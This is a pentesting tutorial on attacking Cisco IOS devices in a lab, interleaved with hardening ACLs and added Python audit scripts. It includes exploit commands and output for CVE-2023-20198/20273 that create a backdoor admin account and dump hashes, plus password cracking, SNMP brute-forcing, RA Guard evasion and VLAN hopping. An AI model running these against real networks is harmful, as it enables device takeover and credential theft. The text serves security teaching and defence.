Lyrica: Pentesting Cisco IOS
Cisco hardware is distributed around the world and is often the target of attackers. In this article, I will demonstrate a Cisco IOS pentest.
Caster - Lyrica
Genre: Offensive
Label: exploit.org
Release Date: 3 July 2024
Performed by: Caster
Written by: Magama Bazarov
Cover Man: Magama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec)
Intro
This article is intended to raise awareness among security engineers when operating Cisco equipment. Although it is an Offensive article, it is intended for both pentesters and network engineers.
"Disciple"
On April 24, 2024, I released a great article on Cisco IOS security, demonstrating the configuration of network security mechanisms. You'll find it useful.
https://blog.exploit.org/caster-disciple/
Disclaimer
This article is for informational purposes and is intended for security specialists conducting testing under an agreed contract. The author and exploit.org are not responsible for any damage caused by the use of the information provided.
Disruption of systems, hacking into other people's computer networks will be prosecuted. Be careful and do not try your luck.
CVE-2023-20273
This is a vulnerability in the Cisco IOS XE Web UI, the web interface used to manage Cisco IOS XE devices.
CVE-2023-20273 is dangerous because it allows an attacker to execute system commands on the device while unauthenticated. Also, with this vulnerability, an attacker can inject a malicious implant to gain full control of the device.
This is a serious problem, not only because the exploit is easy to use, but because Cisco IOS control panels are often overlooked. In production networks this is a big problem: a Cisco IOS device could be on the Internet with an open Web UI, which means an attacker could launch this attack from the Internet and breach the external perimeter of the network.
I'll demonstrate the process of exploiting this vulnerability using Metasploit so you get the gist of the problem. In my lab network, I have a Cisco CSR at IP address 192.168.1.89 that is vulnerable to CVE-2023-20273.
caster@kali:~$ msfconsole
msf6 > use auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273
So it is possible to attack Cisco IOS using this vulnerability. This is a serious issue, proving once again how important it is to filter access to the control panels of your network equipment.
CVE-2023-20198
This vulnerability is also related to the Cisco IOS XE Web UI feature. CVE-2023-20198 occurs due to incorrect path validation in nginx filtering, which allows bypassing authentication and accessing the webui_wsma_http web interface endpoint. This bypass gives the attacker the ability to execute arbitrary Cisco IOS commands or make configuration changes with level 15 privileges.
In fact, because of this vulnerability, the attacker gains full control over the hardware.
Exploiting this vulnerability is very simple: all you need to do is download the exploit and run it. The ease of exploitation is another problem in itself, even a high school student can handle it.
caster@kali:~$ git clone https://github.com/smokeintheshell/CVE-2023-20198
With the -c argument, you can check the target hardware for this vulnerability:
Getting the configuration
The -g argument allows you to dump the entire configuration of the vulnerable hardware:
caster@kali:~/CVE-2023-20198$ ./exploit.py -t 192.168.1.89 -c
Creating an attacker account
You can create an account to get into the control panel:
caster@kali:~/CVE-2023-20198$ ./exploit.py -t 192.168.1.89 -a -u caster -p deftones-myownsummer
Selected Target: 192.168.1.89
Adding New Privilege 15 User
Add User Name: caster
Add User Pass: deftones-myownsummer
Sending exploit to target URL: http://192.168.1.89/%2577eb%2575i_%2577sma_Http
No reportable output from adding users
Check verbose ouput or get running config
Done.
Execution of IOS system commands
It is also possible to execute IOS system commands when exploiting this vulnerability:
caster@kali:~/CVE-2023-20198$ ./exploit.py -t 192.168.1.89 -e "show run | sec username"
Selected Target: 192.168.1.89
Running in Exec Mode
Executing Command: show run | sec username
Sending exploit to target URL: http://192.168.1.89/%2577eb%2575i_%2577sma_Http
username gestalt privilege 15 secret 9 $9$jyjNL./i5hMWCk$RrpsXqSmozq1KHYuGQQXtzv3mpQOKoNFyLr6EfUlubo
username death privilege 15 secret 5 $1$QRIf$jgEB4g2.MCKm.upWbfLbM0
username pregabalin150mg privilege 10 secret 8 $8$vsgWwxvLQJiDYU$D1rCRMZLhdphSn82D9rwpeCF5ZG75TY.15okuL/L1K2
username caster privilege 15 secret 9 $9$L4H.qKvAZ6tbW.$eEcAWawEJjbetZImz7Dlduw1d.fHeDiQQYBvXbfPGsc
Done.
This is how the CVE-2023-20198 vulnerability is exploited.
CVE-2023-20273 & CVE-2023-20198 Exploitation
Metasploit has a dedicated module, cisco_ios_xe_rce, which exploits a chain of two vulnerabilities, CVE-2023-20198 and CVE-2023-20273. This leads to RCE and a Meterpreter shell.
caster@kali:~$ msfconsole
msf6 > use exploit/linux/misc/cisco_ios_xe_rce
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/misc/cisco_ios_xe_rce) >
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.1.89
RHOSTS => 192.168.1.89
A final word on these two vulnerabilities
The ease of exploitation of these vulnerabilities, as well as the consequences, further demonstrates the critical importance of monitoring access to your equipment's control panels. Especially if your equipment is facing the Internet.
This is a warning to network engineers: be careful and check access to your Cisco IOS control panels to avoid what I have demonstrated above.
I will show a small example of how you can protect Cisco IOS control panels from attack using access control lists (ACLs).
Suppose we have an administrator network 10.251.140.0/24; only this network may access the control panel of the Cisco equipment, and all other subnets will be blocked.
CSR(config)# ip access-list standard VTY_SEC
CSR(config-std-nacl)# permit 10.251.140.0 0.0.0.255
CSR(config-std-nacl)# deny any
CSR(config)# line vty 0 15
CSR(config-line)# access-class VTY_SEC in
CSR(config-line)# login on-failure log
CSR(config-line)# login on-success log
CSR(config)# ip http access-lists VTY_SEC
CSR(config)# ip http secure-server
This is how you can restrict access to the Cisco IOS hardware control panel, a fairly simple technique. Access to the VTY lines (and, through ip http access-lists, to the Web UI) is allowed only from the 10.251.140.0/24 network; all other sources are blocked.
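To check a running-config for exactly this exposure, here is an added Python example (it is not the article's own code and not a Cisco tool): it parses the line vty blocks, the ip http settings and the named ACLs of a config, and reports VTY or Web UI access that is not restricted to an administrator network. The two sample configs are constructed for the example; the hardened one reproduces the commands above.

```python
import re

# Constructed sample configs for the audit below (not the article's lab device).
# WEAK_CONFIG exposes VTY and the Web UI to any source; HARDENED_CONFIG applies
# the access-class and ip http access-lists commands shown in the text.
WEAK_CONFIG = """\
ip http server
ip http secure-server
line vty 0 15
 login local
 transport input ssh
"""

HARDENED_CONFIG = """\
ip access-list standard VTY_SEC
 permit 10.251.140.0 0.0.0.255
 deny   any
line vty 0 15
 access-class VTY_SEC in
 login on-failure log
 login on-success log
ip http access-lists VTY_SEC
ip http secure-server
"""

ACL_RE = re.compile(r"^ip access-list (?:standard|extended) (\S+)$")
VTY_RE = re.compile(r"^line vty (\d+) (\d+)$")
HTTP_ACL_RE = re.compile(r"^ip http access-lists? (\S+)$", re.M)


def config_sections(config, header_re):
    """Return [(header_match, [child commands])] for every section whose header
    line matches header_re; children are the indented lines that follow it."""
    sections, current = [], None
    for raw in config.splitlines():
        m = header_re.match(raw)
        if m:
            current = (m, [])
            sections.append(current)
        elif raw.startswith(" ") and current is not None:
            current[1].append(raw.strip())
        else:
            current = None
    return sections


def acl_restricts(entries):
    """True if an ACL limits sources: it needs at least one permit and must not
    permit 'any' (the implicit deny at the end covers everything else)."""
    permits = [e for e in entries if e.startswith("permit")]
    return bool(permits) and not any(re.match(r"permit\s+any\b", e) for e in permits)


def audit_management_plane(config):
    """Return findings for VTY and HTTP(S) management access that is not
    limited to an administrator network by an ACL."""
    findings = []
    acls = {m.group(1): cmds for m, cmds in config_sections(config, ACL_RE)}

    for m, cmds in config_sections(config, VTY_RE):
        lo, hi = m.group(1), m.group(2)
        access_class = [c for c in cmds if c.startswith("access-class ")]
        if not access_class:
            findings.append(f"line vty {lo} {hi}: no access-class, reachable from any source")
        elif not acl_restricts(acls.get(access_class[0].split()[1], [])):
            findings.append(f"line vty {lo} {hi}: access-class ACL does not restrict sources")

    lines = [ln.strip() for ln in config.splitlines()]
    if "ip http server" in lines or "ip http secure-server" in lines:
        m = HTTP_ACL_RE.search(config)
        if m is None:
            findings.append("Web UI enabled without ip http access-lists")
        elif not acl_restricts(acls.get(m.group(1), [])):
            findings.append(f"ip http access-lists {m.group(1)} does not restrict sources")
    if "ip http server" in lines:
        findings.append("plaintext ip http server is enabled; keep only ip http secure-server")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: {audit_management_plane(cfg) or ['no findings']}")
```

Run it against the output of show running-config saved to a file; an empty finding list for the hardened sample and three findings for the weak one is the expected result. The ACL test is deliberately strict: an ACL that ends in permit any, or one that does not exist, counts as no restriction at all.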
Evading RA Guard
RA Guard is designed to filter out illegitimate RA messages. Typically, an attacker uses RA to impose itself as a default gateway address at the IPv6 layer or as a DNS server at the IPv6 layer.
A popular tool among pentesters is mitm6; by manipulating RA/DHCPv6 messages, it allows an attacker to impose itself as a DNS server at the IPv6 level while performing an incomplete SLAAC attack.
However, it is worth noting that mitm6 relies more on DHCPv6 messages than RA.
An incomplete SLAAC attack is a phenomenon in which the attacker does not impose itself as a full-fledged default gateway, limiting itself to affecting only DNS information.
This is what an RA (Router Advertisement) message looks like:
Running mitm6 with the --no-ra flag lets it run without sending RA messages, evading RA Guard:
caster@kali:~$ sudo mitm6 -i eth0 --no-ra
This way you can evade RA Guard if it is active on the switch at the time of your penetration testing project.
However, this attack will be thwarted by DHCPv6 Snooping, if it is configured.
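To show the check that such filtering performs at the protocol level, here is an added Python example (not code from the article, from mitm6 or from any switch vendor): it parses a DHCPv6 Advertise or Reply and reports every DNS server carried in option 23 that is not on a trusted list, which is the content-level counterpart of dropping server messages on untrusted ports. The packet bytes and the addresses are constructed for the example.

```python
import struct
import ipaddress

# DHCPv6 message types and option codes (RFC 8415)
MSG_ADVERTISE, MSG_REPLY = 2, 7
OPT_SERVERID, OPT_DNS_SERVERS = 2, 23


def parse_dhcpv6(payload: bytes):
    """Parse a DHCPv6 UDP payload into (msg_type, transaction_id, [(code, data), ...])."""
    if len(payload) < 4:
        raise ValueError("DHCPv6 header is 4 bytes")
    msg_type = payload[0]
    xid = int.from_bytes(payload[1:4], "big")
    options, off = [], 4
    while off < len(payload):
        if off + 4 > len(payload):
            raise ValueError("truncated option header")
        code, length = struct.unpack_from("!HH", payload, off)
        data = payload[off + 4: off + 4 + length]
        if len(data) != length:
            raise ValueError("truncated option data")
        options.append((code, data))
        off += 4 + length
    return msg_type, xid, options


def dns_servers(options):
    """Extract the IPv6 addresses carried in OPTION_DNS_SERVERS (code 23)."""
    servers = []
    for code, data in options:
        if code == OPT_DNS_SERVERS:
            if len(data) % 16:
                raise ValueError("DNS server option length must be a multiple of 16")
            servers += [str(ipaddress.IPv6Address(data[i:i + 16])) for i in range(0, len(data), 16)]
    return servers


def untrusted_dns_in_reply(payload: bytes, trusted_servers):
    """Return the DNS servers offered by an ADVERTISE/REPLY that are not trusted.
    Client messages (SOLICIT, REQUEST, ...) never carry this option and yield []."""
    msg_type, _, options = parse_dhcpv6(payload)
    if msg_type not in (MSG_ADVERTISE, MSG_REPLY):
        return []
    trusted = {str(ipaddress.IPv6Address(a)) for a in trusted_servers}
    return [s for s in dns_servers(options) if s not in trusted]


def build_option(code: int, data: bytes) -> bytes:
    """Encode one DHCPv6 option (code, length, data); used only to build the samples."""
    return struct.pack("!HH", code, len(data)) + data


# Constructed samples (not captured traffic): a rogue ADVERTISE pointing clients at a
# link-local resolver, and a legitimate one pointing at the enterprise resolver.
ROGUE_ADVERTISE = (
    bytes([MSG_ADVERTISE]) + b"\x12\x34\x56"
    + build_option(OPT_SERVERID, b"\x00\x03\x00\x01" + bytes.fromhex("020000000001"))  # DUID-LL
    + build_option(OPT_DNS_SERVERS, ipaddress.IPv6Address("fe80::1").packed)
)
LEGIT_ADVERTISE = (
    bytes([MSG_ADVERTISE]) + b"\x12\x34\x57"
    + build_option(OPT_DNS_SERVERS, ipaddress.IPv6Address("2001:db8::53").packed)
)
TRUSTED_RESOLVERS = ["2001:db8::53"]

if __name__ == "__main__":
    print("rogue :", untrusted_dns_in_reply(ROGUE_ADVERTISE, TRUSTED_RESOLVERS))
    print("legit :", untrusted_dns_in_reply(LEGIT_ADVERTISE, TRUSTED_RESOLVERS))
```

In a monitoring pipeline the payloads would come from UDP port 546/547 traffic on a SPAN session; a non-empty result for a message that did not originate from the real DHCPv6 server is the signal that a host is handing out its own resolver.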
Identifying the Cisco IOS version
Identifying the Cisco IOS version is critical for a pentester. Knowing the version, a pentester can learn about its specifics, and it may also be possible to find an exploit for that particular Cisco IOS version.
CDP
CDP is Cisco's neighbor discovery protocol for Cisco IOS hardware, and in most cases it is active by default on all ports of a Cisco device. This is what an attacker will see when analyzing the traffic:
This sensitive information can play a big role for the attacker. It is important to monitor the status of CDP on device ports and turn it off carefully. Also consider that there may be VoIP on the network that depends on CDP.
SNMP
SNMP is a protocol designed for monitoring network infrastructure, but it is not an uncommon target of attacks inside a network. In the hands of a pentester, SNMP can serve as a tool to gather information about hardware. This is done by brute-forcing the SNMP community string, with which the attacker can enumerate information about the hardware.
Brute-forcing the SNMP community string is possible with onesixtyone:
caster@kali:~$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 192.168.1.89
In the context of our case study, two strings are found: public and private.
In practice, public and private are the default strings in most cases. By the way, this is a common network security problem in production; many people forget about it.
On the Cisco router in my lab bench, the string public has read-only (RO) permissions, and private has both read and write (RW) permissions.
A string with RO rights can be used to collect equipment information. For example, you can use the snmp_enum module in Metasploit, a very handy tool.
msf6 auxiliary(scanner/snmp/snmp_enum) > show options
Module options (auxiliary/scanner/snmp/snmp_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMUNITY public yes SNMP Community String
RETRIES 1 yes SNMP Retries
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 161 yes The target port (UDP)
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1 yes SNMP Timeout
VERSION 1 yes SNMP Version <1/2c>
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/snmp/snmp_enum) >
My router in the lab has the address 192.168.1.89, so let's specify it in RHOSTS:
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.1.89
RHOSTS => 192.168.1.89
msf6 auxiliary(scanner/snmp/snmp_enum) > run
This is roughly how you can discover the Cisco IOS version: by analyzing CDP traffic, and by SNMP enumeration after guessing the community string.
Cisco Passwords
Cisco IOS passwords reside locally on the hardware and are protected using cryptographic hash functions. However, there are security issues here as well, in the form of insecure password hashing methods. Below I will explain why.
Type 4
Type 4 appeared in 2013. It was meant to use PBKDF2 and was originally designed to reduce vulnerability to brute-force attacks. However, due to an implementation issue, the Type 4 algorithm performs only one SHA-256 iteration (without a salt) over the entered plaintext password, making it less secure than Type 5 and more vulnerable to brute-force attacks. Passwords are stored as hashes in the configuration file:
username myths secret 4 g1rTD89b38NIXbGJse.zLc7Cega1TBTlKQNvYDh9Qo6
Such hashes can be brute-forced using John the Ripper. Just specify the file with the hash and the path to the dictionary, nothing complicated:
caster@kali:~/gestalt$ cat hashes
myths:g1rTD89b38NIXbGJse.zLc7Cega1TBTlKQNvYDh9Qo6
caster@kali:~/gestalt$ john hashes --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 512/512 AVX512BW 16x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@ssw0rd (myths)
1g 0:00:00:00 DONE (2024-06-30 02:28) 50.00g/s 6553Kp/s 6553Kc/s 6553KC/s 123456..kovacs
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed.
Type 5
Type 5 uses a very simple MD5-based hashing algorithm: 1000 iterations of MD5 with a 32-bit salt. Type 5 passwords are relatively easy to crack by brute force using modern computers and available tools. Passwords are stored as hashes in the configuration file:
caster@kali:~/gestalt$ cat hashes
drift:$1$TlXl$FlGAzr9Hn8VqowimPu.TD/
caster@kali:~/gestalt$ john hashes --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 512/512 AVX512BW 16x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cisco (drift)
1g 0:00:00:00 DONE (2024-06-30 02:38) 20.00g/s 491520p/s 491520c/s 491520C/s 210586..20032003
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Type 7
An extremely insecure way to protect passwords; it uses the Vigenère cipher and is very easy to crack using tools such as ciscot7 or cisco7crack:
username enchant password 7 055A545C7519
caster@kali:~/gestalt$ cisco7crack 055A545C7519
Encrypted string : 055A545C7519
Plain string : 12345
caster@kali:~/gestalt$
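The following Python is an added example, not code from the article or from any Cisco tool: it audits the credential lines of a running-config for the weak storage types discussed above (0, 4, 5 and 7), treats types 8 and 9 as acceptable, and ranks each finding by the privilege level the credential grants. The sample config is constructed from the credential lines quoted in this article (the enable secret reuses the Type 5 hash shown for user drift); the service password-encryption line is made up for the example.

```python
import re

# Cisco IOS credential storage types (the digit after 'secret'/'password') and
# how well each protects the password; 8 and 9 are the ones to use today.
SECRET_TYPES = {
    "0": ("plaintext", "weak"),
    "4": ("single unsalted SHA-256", "weak"),
    "5": ("md5crypt: 1000 MD5 rounds, 32-bit salt", "weak"),
    "7": ("reversible Vigenere-style encoding", "weak"),
    "8": ("PBKDF2-SHA256", "ok"),
    "9": ("scrypt", "ok"),
}

USER_RE = re.compile(
    r"^username (?P<user>\S+)(?: privilege (?P<priv>\d+))?"
    r" (?P<kind>secret|password) (?P<type>\d) (?P<hash>\S+)$"
)
ENABLE_RE = re.compile(r"^enable (?P<kind>secret|password)(?: (?P<type>\d))? (?P<hash>\S+)$")


def audit_credentials(config):
    """Return one finding per locally stored credential with a weak storage type.
    Severity is 'high' when the credential grants privilege 15."""
    findings = []
    for raw in config.splitlines():
        line = raw.strip()
        if line == "service password-encryption":
            findings.append({"who": "global", "privilege": 0, "type": "7", "severity": "info",
                             "detail": "service password-encryption only produces type 7; not a protection"})
            continue
        m = USER_RE.match(line)
        if m:
            who, priv, type_ = f"username {m['user']}", int(m["priv"] or 1), m["type"]
        else:
            m = ENABLE_RE.match(line)
            if not m:
                continue
            # 'enable password <pw>' without a type digit is stored as type 0
            who, priv, type_ = "enable", 15, m["type"] or "0"
        desc, strength = SECRET_TYPES.get(type_, (f"unknown type {type_}", "unknown"))
        if strength == "ok":
            continue
        findings.append({
            "who": who, "privilege": priv, "type": type_,
            "detail": f"{m['kind']} {type_} ({desc})",
            "severity": "high" if priv == 15 else "medium",
        })
    return findings


def summarize(findings):
    """Count findings by severity, e.g. {'info': 1, 'high': 2, 'medium': 2}."""
    counts = {}
    for f in findings:
        counts[f["severity"]] = counts.get(f["severity"], 0) + 1
    return counts


# Constructed sample config assembled from the credential lines quoted in the article.
SAMPLE_CONFIG = """\
service password-encryption
enable secret 5 $1$TlXl$FlGAzr9Hn8VqowimPu.TD/
username gestalt privilege 15 secret 9 $9$jyjNL./i5hMWCk$RrpsXqSmozq1KHYuGQQXtzv3mpQOKoNFyLr6EfUlubo
username death privilege 15 secret 5 $1$QRIf$jgEB4g2.MCKm.upWbfLbM0
username pregabalin150mg privilege 10 secret 8 $8$vsgWwxvLQJiDYU$D1rCRMZLhdphSn82D9rwpeCF5ZG75TY.15okuL/L1K2
username myths secret 4 g1rTD89b38NIXbGJse.zLc7Cega1TBTlKQNvYDh9Qo6
username enchant password 7 055A545C7519
"""

if __name__ == "__main__":
    found = audit_credentials(SAMPLE_CONFIG)
    for f in found:
        print(f"[{f['severity']:>6}] {f['who']} (priv {f['privilege']}): {f['detail']}")
    print(summarize(found))
```

The two privilege 15 accounts stored with Type 5 are the ones to fix first; re-entering each password with secret 9 (or at least secret 8) replaces the weak hash, since IOS cannot convert an existing hash to a stronger type.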
TACACS+
This protocol is similar to RADIUS and is used in the Cisco ecosystem to control access to equipment through an AAA server.
However, there is a risk of TACACS+ traffic being intercepted and the key being brute-forced, so care must be taken to keep the TACACS+ key secure.
If an attacker performs a MITM attack and intercepts TACACS+ traffic, they can brute-force the key. Loki is used both to intercept the traffic and to brute-force the key.
So if you have TACACS+ on your network, take care of the key's resistance to brute force.
SMI (2960-X)
Exploitation of Cisco Smart Install is nothing new among pentesters. However, there is a risk of disrupting a Cisco 2960-X switch: for some reason the 2960-X reacts strangely to the SIET exploit, and at the moment of exploitation a DoS occurs and the switch freezes, not even responding to ICMP Echo requests.
If you find SMI (TCP/4786) in your project, check with your client whether a 2960-X happens to be present. If it is, do not take risks and do not exploit this hole. Be careful with SIET.
Don't use CAM Table Overflow
I have noticed that this attack is often explained in network security training materials, but it is not applicable to production networks.
CAM Table Overflow can not only overload the switch CPU but also cause Unicast Flood. This is a phenomenon where Unicast traffic starts to propagate as broadcast traffic. This can have a serious impact on network performance.
This attack sounds cool only on paper; I would not recommend using it in production. CAM Table Overflow has serious side effects.
VoIP VLAN Hopping
The Cisco Discovery Protocol (CDP) can be used by attackers to perform VLAN Hopping, allowing unauthorized access to various VLANs, including VoIP VLAN.
Concept
The concept is simple enough. You need to capture a CDP frame of a legitimate VoIP phone, and then use tcpreplay to replay that frame so that the attacker's laptop can pretend to be the phone to gain access to the Voice VLAN.
Stage I: Learning about switch port information
It is necessary to study the operation of the switch port and how it is configured. This is accomplished by analyzing the CDP frame. You will have to temporarily disconnect the VoIP phone and connect your device to the switch.
Based on the dump of this traffic we can see that the port is indeed configured for Voice VLAN.
The switch port is GigabitEthernet1/0, and the Voice VLAN ID is 512.
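As an added example (not code from the article), the Python below decodes the CDP TLVs that both this stage and the earlier CDP section rely on: device ID, port ID, software version, platform, native VLAN and the Voice VLAN reply TLV. The sample frame is constructed; the port ID GigabitEthernet1/0 and voice VLAN 512 match the values above, and the device name, version string and platform are made up. For a defender, sensitive_fields lists what a given port is advertising, which is the input for deciding where CDP has to stay on (phones) and where it should be off.

```python
import struct

# CDP TLV types used below (from the protocol's public dissection)
TLV_DEVICE_ID, TLV_PORT_ID, TLV_VERSION, TLV_PLATFORM = 0x0001, 0x0003, 0x0005, 0x0006
TLV_NATIVE_VLAN, TLV_VOIP_VLAN_REPLY = 0x000A, 0x000E


def parse_cdp(payload: bytes) -> dict:
    """Parse a CDP payload (the bytes after the LLC/SNAP header) into a dict.
    Header: version (1), TTL (1), checksum (2); then TLVs of type (2), length (2,
    including the 4-byte TLV header) and value."""
    if len(payload) < 4:
        raise ValueError("CDP header is 4 bytes: version, ttl, checksum")
    info = {"version": payload[0], "ttl": payload[1]}
    off = 4
    while off < len(payload):
        if off + 4 > len(payload):
            raise ValueError("truncated TLV header")
        tlv_type, tlv_len = struct.unpack_from("!HH", payload, off)
        if tlv_len < 4 or off + tlv_len > len(payload):
            raise ValueError(f"bad TLV length {tlv_len} at offset {off}")
        value = payload[off + 4: off + tlv_len]
        if tlv_type == TLV_DEVICE_ID:
            info["device_id"] = value.decode("ascii", "replace")
        elif tlv_type == TLV_PORT_ID:
            info["port_id"] = value.decode("ascii", "replace")
        elif tlv_type == TLV_VERSION:
            info["software_version"] = value.decode("ascii", "replace")
        elif tlv_type == TLV_PLATFORM:
            info["platform"] = value.decode("ascii", "replace")
        elif tlv_type == TLV_NATIVE_VLAN and len(value) == 2:
            info["native_vlan"] = struct.unpack("!H", value)[0]
        elif tlv_type == TLV_VOIP_VLAN_REPLY and len(value) >= 3:
            # one flag byte followed by the 16-bit voice VLAN id
            info["voice_vlan"] = struct.unpack("!H", value[1:3])[0]
        off += tlv_len
    return info


def sensitive_fields(info: dict) -> list:
    """Fields a defender would not want advertised on an untrusted port."""
    return [k for k in ("software_version", "platform", "voice_vlan") if k in info]


def _tlv(tlv_type: int, value: bytes) -> bytes:
    """Encode one TLV; used only to build the constructed sample frame."""
    return struct.pack("!HH", tlv_type, 4 + len(value)) + value


# Constructed sample frame (not a capture from the lab). Checksum is left at 0 here;
# a real frame carries the standard one's-complement checksum over the payload.
SAMPLE_CDP = (
    b"\x02\xb4\x00\x00"  # version 2, ttl 180 s, checksum placeholder
    + _tlv(TLV_DEVICE_ID, b"SW-ACCESS-01")
    + _tlv(TLV_PORT_ID, b"GigabitEthernet1/0")
    + _tlv(TLV_VERSION, b"Constructed IOS version string")
    + _tlv(TLV_PLATFORM, b"cisco WS-C2960X")
    + _tlv(TLV_NATIVE_VLAN, struct.pack("!H", 1))
    + _tlv(TLV_VOIP_VLAN_REPLY, b"\x20" + struct.pack("!H", 512))
)

if __name__ == "__main__":
    parsed = parse_cdp(SAMPLE_CDP)
    for key, val in parsed.items():
        print(f"{key:>18}: {val}")
    print("advertised on this port:", sensitive_fields(parsed))
```

To run it on real traffic, feed it the CDP payload of a frame captured with tcpdump or Wireshark (destination MAC 01:00:0c:cc:cc:cc), i.e. the bytes following the SNAP header with protocol ID 0x2000.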
Stage II: Capture and analyze a CDP frame from a phone
Now plug the VoIP phone back into the switch, and plug yourself into the VoIP phone's data port. Now we need to capture a CDP frame from the VoIP phone itself. I'll be using Wireshark for this.
Phone - Cisco IP Phone 7945G
Voice VLAN ID - 512
I need to save this traffic dump.
Stage III: Play back a CDP frame from VoIP
Now you need to replay the captured pcap to pretend to be an IP phone.
This can be done with tcpreplay, a utility that will replay the traffic. When the CDP frame of the VoIP phone arrives on the switch port, the voice VLAN will be available to the attacker.
However, you must consider that a legacy Cisco phone sends a CDP frame every 60 seconds. You need to send this frame every 60 seconds as well; you can use watch to do this:
caster@kali:~$ sudo watch -n 60 "tcpreplay -i eth0 cdpvoip.pcap"
Stage IV: Virtual VLAN Interfaces
After replaying the CDP frame, a virtual 802.1Q interface must be created in order to work with the Voice VLAN.
caster@kali:~$ sudo apt install vlan
caster@kali:~$ sudo vconfig add eth0 512
caster@kali:~$ sudo ip link set eth0.512 up
caster@kali:~$ sudo dhclient -v eth0.512
Create the interface using vconfig, bring it up, and then request an address via DHCP. The attacker can obtain the address either via DHCP or by configuring it statically.
This concludes the chapter on VoIP VLAN Hopping. Despite the existence of the voiphopper utility, which automates the whole process, I decided to explain this attack in detail so that you can better understand what is involved.
DTP Attacks (VLAN Hopping)
One of the most common network attacks on Cisco equipment, and an extremely hackneyed topic really. However, it is a rare misconfig. It occurs on forgotten ports of Cisco 2960 switches, a kind of Shadow IT.
Most likely, such a port will be encountered in the context of an internal pentest in the customer's infrastructure.
The essence of a DTP attack is to send a specially prepared DTP Desirable frame that will switch the switch port to Trunk.
The problem is that all Cisco 2960 switch ports are in Dynamic Auto mode by default. And if a DTP Desirable frame is sent to such ports, the switch port will switch to trunk mode. It is important to take into account that the dynamic trunk lives only 5 minutes, so the DTP Desirable frame will have to be sent with a certain periodicity in order not to lose the trunk.
You can use the Loki tool to attack the DTP.
Now the switch port to which the attacker is connected is switched to trunk mode.
By analyzing the STP frames after the port switched to trunk, we can see the VLAN IDs (Root Bridge System ID Extension): 120, 140, 175, 180 and 200.
Also looking at these STP frames, we can see 802.1Q tags. This is understandable, because we are on a trunk port, and frames are tagged on a trunk port. That's just for the record.
Now for the target VLAN IDs, you need to create virtual interfaces to jump to those VLANs. You can use vconfig to do this:
caster@kali:~$ sudo vconfig add eth0 120
caster@kali:~$ sudo vconfig add eth0 140
caster@kali:~$ sudo vconfig add eth0 175
caster@kali:~$ sudo vconfig add eth0 180
caster@kali:~$ sudo vconfig add eth0 200
caster@kali:~$ sudo ip link set eth0.120 up
caster@kali:~$ sudo ip link set eth0.140 up
caster@kali:~$ sudo ip link set eth0.175 up
caster@kali:~$ sudo ip link set eth0.180 up
caster@kali:~$ sudo ip link set eth0.200 up
You then need to obtain addresses for these virtual interfaces for networking within the target VLANs:
caster@kali:~$ sudo dhclient -v eth0.120
caster@kali:~$ sudo dhclient -v eth0.140
caster@kali:~$ sudo dhclient -v eth0.175
caster@kali:~$ sudo dhclient -v eth0.180
caster@kali:~$ sudo dhclient -v eth0.200
Example of obtaining an address via DHCP for interface eth0.140
This is how VLAN hopping can be accomplished using the shortcomings of the DTP protocol.
In fact, this case is rare, but that doesn't mean it won't happen at all.
HSRP Attacks
HSRP (Hot Standby Router Protocol) is a router redundancy protocol developed by Cisco to improve network availability. It allows multiple routers to share a single virtual IP address, providing automatic switchover to a backup router in the event of a primary router failure. This is one of the protocols of the FHRP (First Hop Redundancy Protocol) class.
Used in Cisco networks, it offers a hot standby system but does not do load balancing. This chapter deals with an HSRP attack followed by a MITM attack.
HSRP Theory
HSRP works by creating a group of routers, one of which is designated as the active router and the others as backup routers. The active router is responsible for handling traffic using a virtual IP address. If the active router fails, one of the standby routers automatically becomes the active router, ensuring continuity of service.
You can delve a little deeper into HSRP terminology to understand what kind of entities the HSRP group has:
- HSRP Active — a device that acts as the virtual router and forwards traffic from source networks to destination networks.
- HSRP Standby — a device that acts as a standby router, waiting for the active router to fail. When the Active router fails, the Standby router takes over the primary role and the duties of the Active router.
- HSRP Group — a group of devices that ensures the operation and fault tolerance of a logical router.
- HSRP MAC Address — the virtual MAC address of the logical router in the HSRP domain.
- HSRP Virtual IP Address — a special virtual IP address in the HSRP group. This IP address is the default gateway for the end hosts and is used on the logical router itself.
This protocol has two versions (HSRPv1, HSRPv2) and they differ in the following characteristics:
- Virtual MAC addresses: 00:00:0c:07:ac:XX for HSRPv1 and 00:00:0C:9F:FX:XX for HSRPv2 (XX is the HSRP group number)
- Multicast addresses: 224.0.0.2 for HSRPv1 and 224.0.0.102 for HSRPv2
- Number of groups: HSRPv1 offers up to 255 groups, while HSRPv2 supports up to 4096
Theory of attack
The essence of an attack on an HSRP domain is to send a forged HSRP packet with the maximum priority value. This is done to take over the Active role, after which the attacker's device serves the traffic of the entire segment: a MITM attack.
However, this attack is risky, because the traffic of every host in the segment will pass through the attacker's device, and if the attacker cannot handle such a heavy load, the result is a DoS. Besides, you cannot exceed the capacity of the switch port you are connected to.
If you decide to launch this attack, make sure you have a powerful computer and a fast network interface. It would be funny to spoof FHRP over a 100 Mbit interface.
HSRP Lab Network
